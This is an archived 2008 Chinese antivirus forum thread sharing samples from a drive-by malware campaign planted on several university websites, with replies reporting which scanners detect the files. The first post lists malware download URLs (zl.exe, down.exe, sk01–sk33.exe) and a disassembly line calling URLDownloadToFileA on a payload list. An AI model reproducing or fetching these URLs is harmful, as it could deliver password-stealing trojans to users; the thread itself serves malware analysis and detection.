苏州大学本科招生网挖之(30x)

显示全部楼层 · 发表于 2008-9-20 16:20:01

附件包含了肥硕的dll文件，所以比较大
对垃圾dll不敢兴趣测试part1即可
挂马还包括

杭州电子科技大学研究生部

hxxp://graduate.hdu.edu.cn/ReadNews.asp?NewsID=1284

深圳职业技术学院汽车与交通学院
hxxp://autocar.szpt.edu.cn/ReadNews.asp?NewsID=809

http://user999.78-10.net/zl.css

0040120D . |E8 7E030000 CALL <JMP.&urlmon.URLDownloadToFileA>
00401212 . |85C0 TEST EAX,EAX
00401214 . |68 50304000 PUSH zlun_.00403050 ; ASCII "http://user.78-10.net/zl.txt"

30
http://user9.78-10.net/zl/zl.exe
http://user9.78-10.net/down.exe

http://user9.78-10.net/down.exe

http://sql.33-66.net/new.txt

http://sql.33-66.net/new.txt

40
http://user9.78-10.net/list/sk01.exe
http://user9.78-10.net/list/sk03.exe
http://user9.78-10.net/list/sk04.exe
http://user9.78-10.net/list/sk05.exe
http://user9.78-10.net/list/sk06.exe
http://user9.78-10.net/list/sk07.exe
http://user9.78-10.net/list/sk08.exe
http://user9.78-10.net/list/sk09.exe
http://user9.78-10.net/list/sk10.exe
http://user9.78-10.net/list/sk11.exe
http://user9.78-10.net/list/sk12.exe
http://user9.78-10.net/list/sk13.exe
http://user9.78-10.net/list/sk14.exe
http://user9.78-10.net/list/sk15.exe
http://user9.78-10.net/list/sk16.exe
http://user9.78-10.net/list/sk17.exe
http://user9.78-10.net/list/sk18.exe
http://user9.78-10.net/list/sk19.exe
http://user9.78-10.net/list/sk20.exe
http://user9.78-10.net/list/sk21.exe
http://user9.78-10.net/list/sk22.exe
http://user9.78-10.net/list/sk23.exe
http://user9.78-10.net/list/sk24.exe
http://user9.78-10.net/list/sk25.exe
http://user9.78-10.net/list/sk26.exe
http://user9.78-10.net/list/sk27.exe
http://user9.78-10.net/list/sk28.exe
http://user9.78-10.net/list/sk29.exe
http://user9.78-10.net/list/sk30.exe
http://user9.78-10.net/list/sk31.exe
http://user9.78-10.net/list/sk32.exe
http://user9.78-10.net/list/sk33.exe

[ 本帖最后由 promised 于 2008-9-20 16:24 编辑 ]

显示全部楼层 · 发表于 2008-9-20 16:22:45

这么大啊

显示全部楼层 · 发表于 2008-9-20 16:38:21

卡巴特征码剩3
TO KL

显示全部楼层 · 发表于 2008-9-20 16:38:25

无法找到该页

您正在搜索的页面可能已经删除、更名或暂时不可用。
请尝试以下操作：

确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。
如果通过单击链接而到达了该网页，请与网站管理员联系，通知他们该链接的格式不正确。
单击后退按钮尝试另一个链接。
HTTP 错误 404 - 文件或目录未找到。
Internet 信息服务 (IIS)

技术信息（为技术支持人员提供）

转到 Microsoft 产品支持服务并搜索包括“HTTP”和“404”的标题。
打开“IIS 帮助”（可在 IIS 管理器 (inetmgr) 中访问），然后搜索标题为“网站设置”、“常规管理任务”和“关于自定义错误消息”的主题。

已删除,这么快??

显示全部楼层 · 发表于 2008-9-20 16:40:59

2- 也被删

google chrome(太伟大了,实机测了好几个有毒站点都报了):
警告：访问此网站可能损害您的计算机！
位於 autocar.szpt.edu.cn 的网站包含来自 jspa-7.cn 网站的元素，且其中似乎包含恶意程式，可能损害您的电脑或在未经您同意之下擅自执行。单凭造访包含恶意程式的网站就足以影响您的电脑。
有关这些元素的问题的详情，请访问 jspa-7.cn 的 Google 安全浏览诊断页面。
了解保护自己、免遭网上有害软件侵害的详情。
我已了解访问此网站可能会损害我的计算机。

显示全部楼层 · 发表于 2008-9-20 17:09:32

好厉害,好肥硕

显示全部楼层 · 发表于 2008-9-20 18:01:43

miss 7.

file:///C:/DOCUME%7E1/ADMINI%7E1/LOCALS%7E1/Temp/moz-screenshot.jpg

显示全部楼层 · 发表于 2008-9-20 20:03:07

part1

drweb 11

显示全部楼层 · 发表于 2008-9-20 21:43:42

微点清空

显示全部楼层 · 发表于 2008-9-21 11:33:26

瑞星病毒查杀结果报告

清除病毒种类列表：
病毒： Trojan.DL.Win32.Game.a
病毒： Trojan.PSW.Win32.XYOnline.aib
病毒： Trojan.PSW.Win32.GameOL.qjk
病毒： Trojan.PSW.Win32.GameOL.qjj
病毒： Trojan.PSW.Win32.GameOL.qkj
病毒： Trojan.PSW.Win32.GameOL.qkd
病毒： Trojan.Win32.Undef.qag
病毒： Trojan.PSW.Win32.GameOL.peb
病毒： Trojan.DL.Win32.Small.vtg
病毒： Trojan.PSW.Win32.OnlineGames.aci

MAC 地址：00:11:2F:5A:58:BC

用户来源：互联网

软件版本：20.62.52

[病毒样本] 苏州大学本科招生网挖之(30x)

本帖子中包含更多资源

本帖子中包含更多资源